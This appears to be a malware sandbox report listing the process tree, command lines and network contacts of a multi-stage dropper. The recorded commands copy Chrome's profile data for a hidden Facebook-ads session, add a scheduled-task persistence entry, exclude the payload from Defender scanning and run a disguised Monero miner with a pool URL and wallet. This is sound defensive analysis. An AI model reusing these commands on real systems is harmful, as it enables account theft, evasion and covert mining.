PID 396 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4132 wrote to memory of 1452 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\4f5baa1083db067.exe
PID 4932 wrote to memory of 4344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe
PID 3544 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe
PID 4620 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\53516815d3135fe3.exe
PID 328 wrote to memory of 1004 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\c862a054a35.exe
PID 4596 wrote to memory of 4336 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe
PID 3252 wrote to memory of 2936 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe
PID 1408 wrote to memory of 4572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe
PID 3788 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe
PID 2972 wrote to memory of 2708 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe
PID 2724 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08240101651be7e1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 9aa6e16872.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 1710990cbc64.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 53516815d3135fe3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c c862a054a35.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 4f5baa1083db067.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f34b9ab9db6d16.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c e4b2f18fb52218.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 453c5fa76a849.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08240101651be7e010.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\4f5baa1083db067.exe

4f5baa1083db067.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe

1710990cbc64.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe

08240101651be7e1.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\53516815d3135fe3.exe

53516815d3135fe3.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\c862a054a35.exe

c862a054a35.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe

9aa6e16872.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe

453c5fa76a849.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe

f34b9ab9db6d16.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe

e4b2f18fb52218.exe

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe

08240101651be7e010.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 396 -ip 396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 396 -s 564

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe

"C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe" -a

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732527219 0

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2936 -ip 2936

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 356

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\xcopy.exe

xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc4f43cc40,0x7ffc4f43cc4c,0x7ffc4f43cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1928 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --field-trial-handle=2188,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1776 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --field-trial-handle=2288,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2496 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3148 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3424,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3580 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3548,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3788 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3860,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4784 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3972,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4752 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5036,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5056 /prefetch:1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4408 -s 740

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3984,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3496 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2008,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3432 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4156,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3456 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4652,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2020 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3476,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3528 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=4132,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3960 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=3236,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4268 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=4200,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3252 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS8B14.tmp\Install.cmd" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc4eaa46f8,0x7ffc4eaa4708,0x7ffc4eaa4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1968 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 16.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 104.26.4.15:443 db-ip.com tcp
US 8.8.8.8:53 api.db-ip.com udp
US 8.8.8.8:53 www.listincode.com udp
US 104.26.5.15:443 api.db-ip.com tcp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 www.maxmind.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 104.17.28.25:80 www.maxmind.com tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 15.4.26.104.in-addr.arpa udp
US 8.8.8.8:53 15.5.26.104.in-addr.arpa udp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 25.28.17.104.in-addr.arpa udp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.18:443 prophefliloc.tumblr.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 18.154.114.74.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
MD 176.123.2.239:80 176.123.2.239 tcp
N/A 127.0.0.1:55740 tcp
N/A 127.0.0.1:55742 tcp
US 8.8.8.8:53 239.2.123.176.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 secure.facebook.com udp
GB 157.240.214.13:443 secure.facebook.com tcp
GB 157.240.221.35:443 www.facebook.com tcp
GB 157.240.221.35:443 www.facebook.com tcp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
GB 157.240.221.35:443 www.facebook.com udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 13.214.240.157.in-addr.arpa udp
US 8.8.8.8:53 35.221.240.157.in-addr.arpa udp
